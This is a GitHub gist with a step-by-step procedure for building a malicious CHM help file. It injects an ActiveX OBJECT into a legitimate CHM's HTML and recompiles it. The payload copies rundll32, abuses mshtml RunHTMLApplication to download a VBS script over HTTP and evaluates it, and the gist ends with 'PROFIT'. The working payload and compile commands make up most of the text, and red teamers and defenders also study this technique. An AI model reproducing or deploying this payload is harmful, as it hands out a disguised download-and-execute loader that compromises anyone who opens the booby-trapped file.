Created
February 6, 2018 13:52
-
-
Save mgeeky/cce31c8602a144d8f2172a73d510e0e7 to your computer and use it in GitHub Desktop.
Revisions
-
mgeeky created this gist
Feb 6, 2018 .There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,53 @@ ## Procedure for generating Malicious CHM file - **Step 0:** Download and install [**Microsoft HTML Help Workshop and Documentation**](https://www.microsoft.com/en-us/download/details.aspx?id=21138) - **Step 1:** Obtain a valid CHM file and unpack it using 7-zip - **Step 2:** Find an entry-point HTML file within "_docs_" directory and insert the following code into it's `<body>` section: ``` <OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1> <PARAM name="Command" value="ShortCut"> <PARAM name="Button" value="Bitmap::shortcut"> <PARAM name="Item1" value=',cmd.exe,/c copy /Y C:\Windows\system32\rundll32.exe %TEMP%\out.exe > nul && %TEMP%\out.exe javascript:"\..\mshtml RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://127.0.0.1:8000/test.vbs",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im out.exe",0,true);}'> <PARAM name="Item2" value="273,1,1"> </OBJECT> <SCRIPT> x.Click(); </SCRIPT> ``` - **Step 3:** Prepare `Project.hpp` file with contents like the below ones: ``` [OPTIONS] Contents file=<PATH-TO-UNPACKED-CHM-DIRECTORY>\Table of Contents.hhc [FILES] <PATH-TO-UNPACKED-CHM-DIRECTORY>\docs\Malicious-File.htm ``` Add every file needed by that CHM to the `FILES` section. Remember to include also previously modified malicious HTM file. - **Step 4:** Compile the project within CHM directory using `hpp.exe` compiler: ``` <PATH-TO-UNPACKED-CHM-DIRECTORY> "C:\Program Files (x86)\HTML Help Workshop\hhc.exe" Project.hpp Microsoft HTML Help Compiler 4.74.8702 Compiling <PATH-TO-UNPACKED-CHM-DIRECTORY>\Project.chm Compile time: 0 minutes, 1 second 353 Topics 7,208 Local links 187 Internet links 2 Graphics Created <PATH-TO-UNPACKED-CHM-DIRECTORY>\Project.chm, 817,791 bytes Compression decreased file by 2,091,702 bytes. ``` - **Step 5:** PROFIT.